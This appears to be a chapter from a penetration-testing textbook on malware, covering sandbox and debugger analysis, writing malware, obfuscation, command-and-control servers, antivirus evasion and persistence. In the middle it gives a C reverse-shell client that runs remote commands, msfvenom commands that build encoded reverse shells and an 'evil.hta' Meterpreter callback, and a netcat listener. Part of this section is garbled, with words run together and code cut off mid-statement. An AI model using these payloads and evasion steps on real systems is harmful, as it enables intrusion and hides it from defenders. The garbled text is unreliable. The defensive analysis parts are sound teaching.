Using your own VM setup can be a lot of work, though. You need to get it set up, get an OS installed, and then get a snapshot of it before you run the malware. After that, you need to compare the system states. There are easier ways to accomplish this. One is to use an automated system that will run the malware inside a VM and then do the comparison for you. If you could get a report back at the end, that would be ideal. Well, if you were wishing for something like that, you may be pleased to know it's available. Cuckoo Sandbox is an automated malware analysis tool. It handles starting up a VM, injecting the malware into it, and then performing some analysis on files, the Registry, network connections, process actions, and memory. Cuckoo Sandbox is freely available software that uses Python for managing the VM and the reporting. You would need to have a Windows VM and a hypervisor that Cuckoo Sandbox could control. These are not necessarily free. Certainly the Windows VM will cost money, though you can generally use a freely available hypervisor like KVM (kernel-based virtual machine). You don't have to use your own Cuckoo Sandbox installation, though. There are some that are available online. One of them is malwr.com; it has been down for some time but is expected to come back, though there is currently no date in sight for that. You can check with Lenny Zeltser's blog for a list of available sandboxes to test your malware in. For our purposes, we are going to run against another implementation of Cuckoo Sandbox, controlled by Hieki Pikker. You upload your sample and Cuckoo Sandbox will run hashes against it, which can be used to check databases to see if the hashes are known. You can do this without running the sample at all. The sample in this case is one we've looked at before. It's entirely benign, though it does leave a file on the disk. It's just a simple one-line text file, so there is nothing suspicious about it at all. However, we can still use Cuckoo Sandbox to execute the program and report back to us on the behavior. Figure 8.14 shows details about the sample that was uploaded. It shows the type of file, portable executable, 32-bit. It also shows the different hash values from the different algorithms, and there is also an entry for Yara, which is a language used to describe malware files.

FIGURE 8.14 Cuckoo Sandbox details

Before running the sample we have provided, we can make some choices about the environment that it runs in. You can see these options in Figure 8.15. This shows us that we can determine how constrained we want the environment, including the network access we want to provide for the sample. In some cases, you may not want to provide full Internet access because it may get out of your control. You may find you want to restrict access there. However, some malware may just not deploy fully if it can't get the Internet. You may also need to provide a longer timeout before the sandbox closes out. You can determine how long you want to wait before the sandbox times out. Cuckoo Sandbox gives you the ability to configure the run, but you don't have to. We're going to use the default settings and run our sample through the sandbox. While it's running, the status will update periodically. When the malware sample is executed, Cuckoo Sandbox generates logs that we can look at. You can see the logs from the sample that was submitted in the following code listing. The logs provide the details of all the monitoring and management that Cuckoo Sandbox does.

FIGURE 8.15 Cuckoo Sandbox options

Cuckoo Sandbox Logs

2021-01-17 02:54:09,015 [analyzer] DEBUG: Starting analyzer from: C:\tmp3oj4f_
2021-01-17 02:54:09,015 [analyzer] DEBUG: Pipe server name: \??\PIPE\kSExGJIXHFbEHDFEKHEYNDsVlRQZEvm
2021-01-17 02:54:09,015 [analyzer] DEBUG: Log pipe server name: \??\PIPE\zRhqTZBEUJoPjNIcpHbDUDobbOoFI
2021-01-17 02:54:09,280 [analyzer] DEBUG: Started auxiliary module DbgView
2021-01-17 02:54:09,983 [analyzer] DEBUG: Started auxiliary module Disguise
2021-01-17 02:54:10,171 [analyzer] DEBUG: Loaded monitor into process with pid 496
2021-01-17 02:54:10,171 [analyzer] DEBUG: Started auxiliary module DumpTLSMasterSecrets
2021-01-17 02:54:10,171 [analyzer] DEBUG: Started auxiliary module Human
2021-01-17 02:54:10,171 [analyzer] DEBUG: Started auxiliary module InstallCertificate
2021-01-17 02:54:10,171 [analyzer] DEBUG: Started auxiliary module Reboot
2021-01-17 02:54:10,203 [analyzer] DEBUG: Started auxiliary module RecentFiles
2021-01-17 02:54:10,217 [analyzer] DEBUG: Started auxiliary module Screenshots
2021-01-17 02:54:10,217 [analyzer] DEBUG: Started auxiliary module LoadZer0m0n
2021-01-17 02:54:10,265 [lib.api.process] INFO: Successfully executed process from path u'C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\bogus.exe' with arguments '' and pid 2268
2021-01-17 02:54:10,437 [analyzer] DEBUG: Loaded monitor into process with pid 2268
2021-01-17 02:54:10,437 [analyzer] INFO: Added new file to list with pid 2268 and path C:\Users\Administrator\AppData\Local\Temp\file.txt
2021-01-17 02:54:10,608 [lib.api.process] INFO: Memory dump of process with pid 2268 completed
2021-01-17 02:54:11,312 [analyzer] INFO: Process with pid 2268 has terminated
2021-01-17 02:54:11,328 [analyzer] INFO: Process list is empty, terminating analysis.
2021-01-17 02:54:12,328 [analyzer] INFO: Analysis completed.

Cuckoo Sandbox takes screen captures during the run. In Figure 8.16, you can see the information about the run, which includes a thumbnail for the screen capture that was taken while the sample was being run. Additionally, we get statistics about the run. This includes the amount of time it took for the system to run the sample. We also get links to the logs, some of which we looked at earlier. This is where we get details about what happened to the system. The details about the run provide us with some information, the screen capture can provide additional details, and the logs get granular. In the analyzer log, it shows that the sample created a file in the filesystem. We get the path and filename for that file. If there had been network activity from the sample, we would have been able to see that as well.

FIGURE 8.16 Cuckoo Sandbox results
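The analyzer log above is what a triager reads to answer "what ran, what did it drop, and how did it end". The following is an added example and is not code from the book or from the Cuckoo Sandbox project: a small Python parser that recognises the analyzer line format and the handful of messages shown in the listing (process start, monitor injection, file creation, memory dump, termination, analysis end) and folds them into a per-process summary. The SAMPLE_LOG lines are constructed for this example and modeled on the listing above; the regular expressions match only the message forms visible there, so a real run would need patterns added for any other events you care about.

```python
import re

# Constructed sample, modeled line for line on the Cuckoo Sandbox analyzer log shown above.
SAMPLE_LOG = r"""
2021-01-17 02:54:10,171 [analyzer] DEBUG: Loaded monitor into process with pid 496
2021-01-17 02:54:10,265 [lib.api.process] INFO: Successfully executed process from path u'C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\bogus.exe' with arguments '' and pid 2268
2021-01-17 02:54:10,437 [analyzer] DEBUG: Loaded monitor into process with pid 2268
2021-01-17 02:54:10,437 [analyzer] INFO: Added new file to list with pid 2268 and path C:\Users\Administrator\AppData\Local\Temp\file.txt
2021-01-17 02:54:10,608 [lib.api.process] INFO: Memory dump of process with pid 2268 completed
2021-01-17 02:54:11,312 [analyzer] INFO: Process with pid 2268 has terminated
2021-01-17 02:54:11,328 [analyzer] INFO: Process list is empty, terminating analysis.
2021-01-17 02:54:12,328 [analyzer] INFO: Analysis completed.
"""

# '<timestamp> [<source>] <LEVEL>: <message>'
LINE = re.compile(r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d,\d{3}) \[(?P<src>[^\]]+)\] (?P<level>[A-Z]+): (?P<msg>.*)$")

# Message patterns taken from the listing; extend this table for other analyzer events.
EVENTS = {
    "exec": re.compile(r"Successfully executed process from path u?'(?P<path>.*?)' with arguments '(?P<args>.*?)' and pid (?P<pid>\d+)"),
    "monitor": re.compile(r"Loaded monitor into process with pid (?P<pid>\d+)"),
    "file": re.compile(r"Added new file to list with pid (?P<pid>\d+) and path (?P<path>.+)"),
    "memdump": re.compile(r"Memory dump of process with pid (?P<pid>\d+) completed"),
    "exit": re.compile(r"Process with pid (?P<pid>\d+) has terminated"),
    "done": re.compile(r"Analysis completed\."),
}


def parse_events(text):
    """Yield (timestamp, kind, fields) for each recognised line; unrecognised lines are skipped."""
    for raw in text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        for kind, rx in EVENTS.items():
            e = rx.search(m["msg"])
            if e:
                yield m["ts"], kind, e.groupdict()
                break


def summarize(text):
    """Fold the events into the report a triager wants: processes, dropped files, and how the run ended."""
    procs, files, monitored, completed = {}, [], [], False
    for ts, kind, f in parse_events(text):
        pid = int(f["pid"]) if "pid" in f else None
        if kind == "exec":
            # The analyzer prints a Python repr of the path, so backslashes arrive doubled.
            procs[pid] = {"path": f["path"].replace("\\\\", "\\"), "args": f["args"],
                          "started": ts, "exited": None, "memory_dump": False}
        elif kind == "monitor":
            monitored.append(pid)
        elif kind == "file":
            files.append((pid, f["path"]))
        elif kind == "memdump":
            procs.setdefault(pid, {})["memory_dump"] = True
        elif kind == "exit":
            procs.setdefault(pid, {})["exited"] = ts
        elif kind == "done":
            completed = True
    return {"processes": procs, "files_created": files, "monitored_pids": monitored, "completed": completed}


if __name__ == "__main__":
    report = summarize(SAMPLE_LOG)
    for pid, info in report["processes"].items():
        print(pid, info)
    print("files created:", report["files_created"])
    print("monitored pids:", report["monitored_pids"], "completed:", report["completed"])
```

The files_created list is the part worth keeping alongside the hashes from the Details page: a dropped file's path is a host-based indicator you can search other machines for, and a process that exits without creating files or network activity is the pattern to expect from a sample that detected the sandbox and went inert.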
Using Cuckoo Sandbox takes the risk of running malware off our systems and network. However, it takes the control of running the malware away from us as well. There are cases where you may want to be able to see exactly what the malware is doing and be able to see the code while that's happening.

Debugging

Using a debugger gives you complete control over the run of your sample. Of course, it also puts the problems that may come with that malware in your hands. With the control you get from a debugger, though, you can potentially skip over any really bad actions. Before we go too far down the path, let's talk about what a debugger is. A debugger gives a developer control over the run of a program, meaning the developer can go line by line through the program. In an integrated development environment (IDE), the debugger that's integrated would commonly give us the ability to work through the source code line by line and function by function. We don't have that luxury, though, when we are talking about malware analysis. If we had the source code, we wouldn't need to do any of this. Instead of stepping through the source code line by line, we would be working through opcode by opcode, since we are looking at the disassembly rather than the source code. There are a lot of debuggers available. The king of debuggers and disassemblers is IDA Pro. You can work across multiple processor architectures and operating systems with IDA Pro. You may not need all of the power that comes with IDA Pro, so you could use OllyDbg, the Immunity Debugger, or the Windows Debugger from Microsoft. We're going to start with a look at using the community edition of IDA rather than the Pro version, because it will have everything we need. It's important to keep in mind that CPU architecture is important. If you try to load a 64-bit program into a 32-bit debugger, for instance, you won't be able to run it through. A 32-bit debugger just won't know how to handle a 64-bit program because the debugger is running as a 32-bit program. Make sure you are matching CPU architecture in the program to a debugger that can support that CPU architecture. This is one of the reasons for using a commercial tool like IDA Pro. First, we need to load up our executable into IDA Free. Figure 8.17 shows the set of options that you can select when you are loading a file. These are selected by IDA, but you can make some adjustments. For example, IDA determined that the file is a 64-bit portable executable binary. If you somehow know it's not that and IDA has made a bad determination, you could change that. It would be unlikely for IDA to not know because all of this comes from metadata in the file. However, if you really want to do something different from what IDA is selecting, you can make changes.

FIGURE 8.17 New IDA session

IDA will load the file and then present you with the disassembly in multiple ways. One of those ways is essentially a graph view. The graph view shows the entry function followed by pathways the program can take. This provides a visual path through the program. In our case, it's a simple and small program. This view is far more beneficial if you have a large program with multiple execution paths. You could test the different execution paths by following them visually rather than trying to keep track of what you are doing. Figure 8.18 shows a portion of the initial view of the disassembled program. Just for comparison purposes, we're going to take a look at OllyDbg, which is a freeware debugger. Once we've loaded the program into OllyDbg, we get the view you can see in Figure 8.19. OllyDbg gets straight to the point. You get a disassembly and the corresponding hex dump, showing you what it looks like at the byte level. You also get a view of the registers and their values on the right side. These values will change as the program runs. It's easier to see this if you are stepping through the program one operation at a time. This gives you a much better view of how the program is operating and what each operation is doing. If you were to just start off the program, it would run through to completion and you wouldn't see anything. As a result, you need to set a breakpoint. The breakpoint will cause execution to halt at the place in the program you want it to. You need this to stop at the entry point of the program if you want to see everything that happens. To do that, you need to locate the entry point of the program. One easy way to do that is to make use of the call stack. When the program runs, each function is added to the call stack so you can trace the program through the function calls. When you open up the call stack window, as you can see in Figure 8.20, the very top entry in the call stack is the entry point. It's the first function that's called. To get the call stack, you do need to run through the program once. Once you have the memory address where the entry point is located, you can set a breakpoint by right-clicking the operation and toggling the breakpoint from the context menu. Once the breakpoint is in place, you can start the run of the program. As soon as you start it, the program will stop because of the breakpoint. To get it going again, you can step through the program a line at a time, or you could just allow the program to continue to run, either to the next breakpoint or to the completion of the program. There are multiple ways of stepping through the program. If you step into it, you will follow execution through all functions, including library functions that are part of the C standard library. This means you are hopping around through memory. You could step over, which means you'll call the function and just stay in the area in memory where you have been.

FIGURE 8.18 IDA view

FIGURE 8.19 OllyDbg view

When you are looking at a Linux program, you will likely see statements showing int 0x80, which calls interrupt vector 128 (0x80). This indicates you are making a system call. A system call is when you are making a request of the kernel/operating system. In Windows, you can still do that, but it's more common to see calls to library functions that wrap the system calls. These application programming interfaces (APIs) make the code more standardized and probably more optimized than code that makes the system call directly.

FIGURE 8.20 Call stack

Calling a library function is a fairly simple process. You use the call operation, passing in the memory address of the function you are calling. In doing this, just as with any time you are adding a stack frame by using a function, you need to make adjustments to stack pointers. In the following code listing, you can see a section of assembly code where a library function is called twice. Just before calling the runtime library function, iob_lb0, the stack pointer and instruction pointer are stored in preparation for jumping to a new function.

Calling Library Functions

|  0x004012e0  sub esp, 0x1c
|  0x004012e3  mov dword [esp], 1
|  0x004012ea  call dword [sym.imp.msvcrt.dll___set_app_type]  ; 0x408198
|  0x004012f0  call sub.msvcrt.dll__iob_1b0
|  0x004012f5  lea esi, [esi]
|  0x004012f9  lea edi, [edi]
|  0x00401300  _WinMainCRTStartup:
|  0x00401300  sub esp, 0x1c
|  0x00401303  mov dword [esp], 2
|  0x0040130a  call dword [sym.imp.msvcrt.dll___set_app_type]  ; 0x408198
|  0x00401310  call sub.msvcrt.dll__iob_1b0
|  0x00401315  lea esi, [esi]
\  0x00401319  lea edi, [edi]
/ (fcn) sym._atexit 6
|  0x00401320

The library functions make following the program easier because they are called by name; since the libraries are named and the functions have labels, the processor knows which memory space to jump to and where within that space. The labels are the function names, so you can at least get something of a handle on part of the program without having to step into the function to watch every operation.

Creating Malware

There are a lot of places to acquire malware samples that you can use. The problem with using someone else's malware when you are testing is that you may not be fully aware of everything the malware does. On top of that, the malware may be trying to communicate with systems under someone else's control. As you are testing with your clients, you may need to make use of malware, or at least grayware. Keep in mind that you are bound to behave ethically, which means you can't use actual malware that may cause damage to a system. Your goal may be to maintain access to a system without being noticed. It may also be to see if you can get malware injected into the network and onto systems without detection. If you need to start from scratch, there are a couple of approaches you can take. The first is to just write it yourself. This requires some ability to program. The second is generally easier and makes use of Metasploit, since it has so many modules already in place and there is a way to generate a stand-alone executable.

Writing Your Own

If you have some programming experience, or at least a willingness to jump in and try to learn, you can try to create your own malware. A simple way to do this is to just create a program that could perform whatever function you need. For example, you could write a client that could connect back to any handler or netcat-based listener. This client could give you remote access to the system, which would be useful. You would need to use some other attack to get your program onto the system, but once it's there, the system could be under your control. You need to pick a programming language to write your malware in. There are a lot of choices. Python is currently a popular programming language, and there are enough libraries to support pretty much anything you may want to do. The problem with Python, generally, is that it requires a Python interpreter to be installed on the system running the script. You'll find most systems won't have Python installed, and while you may be able to get Python installed, it's probably a lot of work. A language like C is time-tested and has a lot of source code available online for you to pull pieces to cobble together a working program. There are Python compilers that can take a Python script and generate an executable for you. If you are really interested in writing Python, you may be able to use this option. Where C is different from Python is that C is a compiled language. Before you have a program, you need to take your source code and run it through a compiler to get a working program. The best way to do this is to compile your program on the same platform as your target. If you are looking to install this program on a Windows 32-bit system, compiling it on a Windows 32-bit system would be easiest. There are cross-compilers available that can generate a Windows executable on a Linux system and vice versa. You can even manage 32-bit versus 64-bit with the right libraries and compiler. Most people will make use of one of the Microsoft IDEs to build software in. That's a lot of software for the kinds of programs you will likely be writing, and Visual Studio is more designed for programs to make use of Windows API rather than just standard C libraries. There are other options. A minimal GNU environment for Windows (MingW) can give you compilers on a Windows system. You can also go all in and get a full GNU toolset.

The following code listing is a small program that has minimal functionality to initiate a connection to a system. On the remote system, you can have just a netcat listener waiting, or you could have a custom program designed to listen to this simple client. You could also make use of a handler from a framework like Metasploit. The program you see here, compiled and tested on a Linux system, will connect to the IP address specified. This is bad programming practice, but hard-coding an IP address minimizes any interaction with the system you are trying to infiltrate. One good way to handle an address like this would be to accept it on the command line or take a configuration file. You don't want any interaction needed from the user. So, you should know your IP address ahead of time, and you can just put it in here, compile the program, and send it out.

malclient.c Program

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

void handleRequest(char *req) {
    system(req);
}

int main(int argc, char **argv) {
    printf("Starting client\n");
    struct sockaddr_in addr;
    struct sockaddr_in srv;
    int sock, data = 0;
    char buffer[256];

    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        printf("Error creating socket! Stopping...\n");
        return -9;
    }
Malware■memset(&srv,'0',sizeof(srv));srv.sin_family=AF_INET;srv.sin_port=htons(4444);if(inet_pton(AF_INET,"127.0.0.1",&srv.sin_addr)searcharch:x86platform:windowsreverse_tcpMatchingModules================NameDisclosureDateRankCheckDescription-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­payload/windows/dllinject/reverse_tcpnormalNoReflectiveDLLInjection,ReverseTCPStagerpayload/windows/dllinject/reverse_tcp_allportsnormalNoReflectiveDLLInjection,ReverseAll-­PortTCPStagerpayload/windows/dllinject/reverse_tcp_dnsnormalNoReflectiveDLLInjection,ReverseTCPStager(DNS)payload/windows/dllinject/reverse_tcp_rc4normalNoReflectiveDLLInjection,ReverseTCPStager(RC4StageEncryption,Metasm)354 Chapter8  Malware■payload/windows/dllinject/reverse_tcp_rc4_dnsnormalNoReflectiveDLLInjection,ReverseTCPStager(RC4StageEncryptionDNS,Metasm)payload/windows/dllinject/reverse_tcp_uuidnormalNoReflectiveDLLInjection,ReverseTCPStagerwithUUIDSupportWhenwecreatetheexecutablewearegoingtouse,weneedtousemsfvenom.Thiswilltakeoneofthepayloadscripts,writteninRuby,andcompileittoanoutputfilethatwespecify.Inthefollowinglisting,youcanseetheuseofmsfvenomtocreateanExecutableandLinkableFormat(ELF)file.ThisistheexecutableformatonLinuxsystems,liketheportableexecutable(PE)formatisforWindows.Thecommandlineindicatesthatwearecreatinganexecutableforanx86,meaning32-­bitsystem,runningLinux.ThepayloadisareverseshelloveraTCPconnectiononport4444.Thesystemwearegoingtobeconnectingtoislocatedat127.0.0.1,sinceit’sjustgoingtobeusedtoconnecttoanetcatlisteneronthelocalhost.Theoutputiscalledthepayload,thoughitcouldbecalledanything.Thisisthenameoftheexecutablethatweget.Attheendoftheoutput,youcanseethatthefileisanELFexecutablethatis32-­bit.TorunitonaLinuxsystem,though,youneedtosettheexecutablebit.Usingmsfvenomkilroy:~$msfvenom-­ax86-­plinux/x86/shell_reverse_tcplhost=127.0.0.1lport=4444-­felf-­-­platform=linux-­opayloadNoencoderorbadcharsspecified,outputtingrawpayloadPayloadsize:68bytesFinalsizeofelffi
le:152bytesSavedas:payloadkilroy:~$chmod+xpayloadkilroy:~$./payloadkilroy:~$filepayloadpayload:ELF32-­bitLSBexecutable,Intel80386,version1(SYSV),staticallylinked,nosectionheaderBeforerunningthepayloadthatwehaveinexecutableform,weneedtohaveournetcatlistenerrunning.Inthefollowingcodelisting,youcanseewhatitlookslikewhenwestartupnetcatontheporttowhichthepayloadwillbeconnecting.Whatyouwillnoticeisthatthereisnoindicationthatnetcatislisteningorthatithasreceivedaconnection.SinceIwassittinginfrontofbothends,IknewwhentheconnectionhadbeenmadesoIwasabletosendacommandbacktothepayloadprogramthatwasrunning.ThisisanadvantageofusingsomethinglikeaMeterpretershellandlistener.Whenyougetaconnectionthere,youwillbeabletoseewhenyougetaconnectionback.CreatingMalware 355netcatConnectionkilroy:~$nc-­lp4444lsDesktopDocumentsDownloadsEmpireMusicPicturesPublicTemplatesVideosclientclient.cdotfiles.tar.gzfontconfiggomailpayloadprltoolsrequest.ps1sps18-­129srcteamviewer_amd64.debOfcourse,aswithanyconnection,wehavethepermissionsoftheuserrunningtheprogram.Whatyoucanseeearlierisadirectorylistingofthehomedirectoryofaregularuser.Thisisthedirectoryfromwhichthepayloadprogramisrunning.Youarenotcappedthere,though.Youcanmovearoundthefilesystem,sincethereisnothingtojailyouwithinthedirectoryyouarein.Onethingyoumayrunintoisintrusiondetectionsystemsorantivirusprogramscatchingyourmalware.Forthisreason,Metasploitcanencodetheresultingprogram.Encodingitobscurestheactualpayloadsoitmaynotlooklikemalicioussoftwaretoaprogramlookingforit.Thiscanbedonebyjustaddingtheencodertothecommand-­lineparameterstomsfvenom.Inthefollowinglisting,youcanseethenecessaryparametertoaddoneofthecommonencoderstothepayload.Encodinga Payloadkilroy:~$msfvenom-­ax86-­plinux/x86/shell_reverse_tcplhost=127.0.0.1lport=4444-­felf-­-p­latform=linux-­ex86/shikata_ga_nai-­i5-­opayload356 Chapter8  
    Found 1 compatible encoders
    Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
    x86/shikata_ga_nai succeeded with size 95 (iteration=0)
    x86/shikata_ga_nai succeeded with size 122 (iteration=1)
    x86/shikata_ga_nai succeeded with size 149 (iteration=2)
    x86/shikata_ga_nai succeeded with size 176 (iteration=3)
    x86/shikata_ga_nai succeeded with size 203 (iteration=4)
    x86/shikata_ga_nai chosen with final size 203
    Payload size: 203 bytes
    Final size of elf file: 287 bytes
    Saved as: payload

You can specify the number of iterations you want to use to pass the resulting payload through the encoder. There is no particular number that works better than another. The more times you pass it through the encoder, the more you are obscuring the payload contained in the executable. Of course, running it through once will obscure the payload. However, if someone happens to know what one payload that's been passed through an encoder once or twice looks like, there is the chance that it could be caught. The goal is to not get caught and to get your payload run.

Generate Malware

Get a copy of Metasploit. You can obtain it from Rapid7 or from https://github.com/rapid7/metasploit-framework. Use msfvenom to generate an encoded executable for whatever platform you like for the metsvc_reverse_tcp payload.

Obfuscating

There are a few different ways you can obfuscate malware. This is essential since anti-malware solutions are getting better at detecting malware based on common practices. In addition to encryption and packing, you may also convert your malware to other executable types. One of these is PowerShell. You can easily generate obfuscated PowerShell that performs a lot of the same capabilities that traditional malware may have. Additionally, you may use other application styles that may not only help you get around anti-malware programs but also make infection easier. On Windows systems, you can use a technique called Hypertext Markup Language (HTML) applications (HTA). These are single files that include an entire executable based on using HTML for any display that may be needed in addition to a scripting language, like
JavaScript. You may also see dynamic HTML used. Using an HTA, you can deliver it using a website. This may be easier to deliver without needing to send email attachments that could be blocked. You can include any malicious code, encoded, in the scripting part of the HTA. It's also easy to create these applications using Metasploit, just as we used Metasploit to create some simple malware earlier. This is how you could use msfvenom to create an HTA that includes a reverse TCP Meterpreter shell.

    msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.2.15 lport=443 -e x86/shikata_ga_nai -f hta-psh -o evil.hta

Ultimately, the goal is always to get malicious software onto a target system. You will be fighting lots of protections on systems to get that malicious software through. Since Windows runs HTML applications using a known and trusted Windows executable, mshta.exe, you may be able to get past even application whitelisting, which can be effective at protecting against malware by blocking all executables that aren't specifically allowed. Application whitelisting, while highly effective, is also difficult to manage, or at least thought to be difficult to manage. It requires a highly structured environment where all applications are always known.

Malware Infrastructure

You will have noticed that when we put a program onto a target system, there is another end of the communication stream that allows access to that target system. If we were interested only in causing malicious behavior, it wouldn't matter. The goal we have is to maintain access to the system beyond the initial infection. Commonly, you will see that complex malware has infrastructure. We had a server set up that our client software connected to so we could issue commands. This is a simplified version of what you would see in the wild. You may have seen news articles about the Mirai or Kelihos botnets being taken down. Botnets have command-and-control infrastructure that allows an attacker to send commands to the bots, which are endpoints in a botnet. Figure 8.21 shows a logical representation of what a botnet might look like. This is essentially a single-tier C&C network. A large botnet would likely require multiple tiers of servers to control millions of devices. This may mean a single device at the top, which manages a number of other devices. Each of those devices may manage a number of others below them. The attacker interfaces with the top-level device to send commands to the endpoints, telling them what to do. This may be setting up a web infrastructure to sell pharmaceuticals, for example. It may also be sending out unsolicited commercial email (UCE, referred to colloquially as spam) or starting up a distributed denial-of-service attack.

There are a few protocols that could be used to manage this sort of infrastructure. There are times you may see the Internet Relay Chat (IRC) protocol used to send commands to endpoints. This would be done by posting an action into a previously identified IRC channel. The endpoints would connect to the IRC server and check the channel for commands.

FIGURE 8.21 Command-and-control infrastructure (Attacker; C&C1, C&C2, C&C3; Bot1, Bot2, Bot3, Bot4)

Another way to do this is to create a web-based infrastructure so the endpoints connect to a previously identified web server to retrieve pages that would have commands for the endpoints to act on. This doesn't mean, though, that you have to stand up an Apache, Nginx, or IIS server just to serve up pages. There are technologies that can make this quite a bit easier. Node.js is a way to quickly stand up a web server where the actions are written in JavaScript. Node.js has a number of libraries that can be used to make this process even easier. The frameworks and libraries take care of all the underlying protocol exchanges, and all you need to do is write some high-level code. You could implement a RESTful service in Node.js. REST is Representational State Transfer, adding the capability to manage the state of an application that HTTP doesn't support. REST services use "endpoints" to pass messages to the server and get responses. An endpoint is just a URL that tells the server what function or set of functions is being called. On top of Node.js, you can make use of the Express library to manage all of the application communications for you. You just create the responses to the endpoint calls. This can be done with a handful of lines of code. Of course, running the code requires you to have Node.js and the necessary libraries installed. In the following code listing, you can see the basic outline of a Node.js program that could handle requests at the endpoint /check. Adding endpoints is as simple as adding functions with the endpoints defined.

Node.js Program for RESTful Services

    var express = require('express');
    var app = express();
    var fs = require('fs');

    app.get('/check', function (req, res) {
    })

    var server = app.listen(8081, function () {
      var host = server.address().address
      var port = server.address().port
      console.log("Server is listening at %s on %s", host, port)
    })

What you'll see here is an endpoint that doesn't actually do anything. You can send the request in, but nothing will happen. To make something happen, you need to add code to the function that handles GET requests to /check. The Express library can also handle POST requests. To take a POST, you just use app.post instead of app.get. What you can do is respond with JavaScript Object Notation (JSON), which consists of a key or property followed by a value. This is helpful because the key/value pairs end up being essentially self-documenting. You can add in a JSON response by changing that app.get function to look like what you see here.

Sending a Response with Express

    app.get('/check', function (req, res) {
      res.json({action: 'email'})
    })

Of course, you don't have to make use of Node.js to build your infrastructure if you need C&C services. It's a fairly easy way to stand up a web server with application-like functionality, but you could also write pages that could be put up into a web server that either already exists or could be installed.

Antivirus Solutions

Antivirus is going to be the bane of existence for anyone writing malware. Fortunately, it's not all that hard to fool antivirus if the malware author wants to put in a little effort. Keep in mind that antivirus typically uses known properties of malware to identify it. This may be a hash of the malware. To generate a different hash, the malware just needs to change a
single byte. That single byte change will result in a completely different hash.

Malware can use a number of techniques to get around antivirus. First, any new malware won't be identified because there isn't a signature for it until it has been analyzed and the signature has been added to the database for the antivirus software. Sometimes, malware can be polymorphic. This means it has many shapes. The program essentially rewrites itself as it propagates, making minor modifications as it goes. This means each copy could look different. This would require the malware to make alterations to the binary file, potentially by writing out a fresh copy as it propagates. Most types of malware can be polymorphic, but it takes some skill on the part of the malware author. They need to know how to make alterations to copies of the program without resulting in an executable that won't run.

Malware can use packers and encryptors to make it difficult for antivirus to detect it. Using a different packing scheme, perhaps by compressing harder or not as hard, can result in a file that looks different because the data section would appear to be different. Encryption could use a different key, and the file would look different. Even in cases where antivirus or endpoint detection is looking at behaviors, dropped files could have randomly generated names. The same is true with Registry keys and values. Writing files and Registry values as actions aren't especially troublesome, so these protection solutions can't just identify those actions. There would be too many alerts on common actions. They need more specific details to look for. This is one reason systems that have antivirus solutions in place can become infected by malware.

A common piece of software used in enterprise environments today is endpoint detection and response (EDR). A lot of EDR software includes the ability to detect malicious software. It may do this by observing how executables operate. There are some patterns of execution that malware uses. Malware may read from and write to specific registry keys, for instance. It may work within some common directories. These are the sorts of techniques nonmalicious software doesn't use. This sort of detection capability can be used to enhance more traditional malware detection.

Persistence

Malware is not a one-and-done exercise, for the most part. This is especially true when the purpose of the malware is to offer remote access to an attacker. The attacker wants the malicious software to keep running across login/logouts and reboots. There are several techniques an attacker can use to ensure the software always runs. Starting at the boot process, malware may install itself to run before the operating system even starts up. This allows it to control the boot process and ensure it is in memory before any protections may be in place. Pre-boot malware is not common, but it is one of the most dangerous because it's harder to detect, since it is already running before any anti-malware program may start up.

On Windows systems, attackers may use the Windows Registry to add keys that will automatically start software. There are a couple of commonly used Registry keys. The first is HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run, which will start up software when the system starts up. Another is HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. This key is used to start up a program when a user logs in. This registry key belongs to a specific user, so the malware will start only when that user logs in. This means the malware is limited to the permissions of that user. The preferred key will be the one under HKEY_LOCAL_MACHINE, since it will run with machine-level permissions; however, sometimes an attacker has only user-level permissions.

Another technique is scheduled tasks. This persistence mechanism will work on Unix-like operating systems as well as Windows systems. On Unix-like systems, cron is the facility that is used commonly for scheduled tasks. There may be different implementations of it that may be called other things, but ultimately, it's cron. On Windows systems, there is the at program. This works similarly to scheduled tasks on Unix-like systems. You set up a program to run at a specified time. On Unix-like systems, you may also have tasks that run hourly, daily, or weekly.

There are some other techniques that can be used for persistence. Again, the MITRE ATT&CK Framework lists all known persistence mechanisms. This may include operating system-specific techniques, such as the Windows Management Instrumentation (WMI) event subscription. Others may be fairly consistent across operating systems, such as using startup scripts. These techniques can generally be detected, which means attackers are always looking for new techniques for persistence.

Summary

Malware is a serious problem across the information technology industry. It affects businesses and people alike. Malware authors generally have the upper hand. If they want to be on top of things, they can be always ahead of antivirus programs. This means they can get the malware into systems before anyone can protect against it. They usually get a leg up with new malware, and they can also keep modifying their malware to make it even harder to detect.

This is where malware analysis comes in. There are two types of analysis. The first is static analysis, which comes from looking at the properties of the malware as well as the actual code. You can look at the composition of the file, including the number and size of the sections of a PE file. Static analysis can also potentially tell you whether you have a packed executable or not. One way of knowing this is looking at the entry point of the application. The entry point is determined at compile time, based on the address space provided to the program. This address can be labeled and not just be an address. If you see an entry point named something like UPX, you will know that it has been packed, because UPX is a common packer. Disassemblers are useful for looking at the code and also looking at some properties of the executable.
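The entry-point heuristic just described, together with the earlier point in the Antivirus Solutions section that changing a single byte produces a completely different hash, can be shown with a small PE section-table parser. The following is an added example for this page, not code from the book or from any tool it names. It builds a minimal PE32 image in memory (a constructed sample, not a real executable), finds the section whose address range contains AddressOfEntryPoint, applies the UPX-name check, and then flips one byte to show that the SHA-256 changes while the structural verdict does not. The function names (build_sample_pe, parse_pe, entry_section, looks_packed, sha256_hex, flip_one_byte) are this example's own.

```python
import hashlib
import struct

SECTION_HEADER = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes
COFF_HEADER = "<HHIIIHH"          # IMAGE_FILE_HEADER, 20 bytes
PE32_OPTIONAL_SIZE = 0xE0         # size of a PE32 optional header


def build_sample_pe(section_names, entry_rva):
    """Construct a minimal PE32 image in memory (sample data for this
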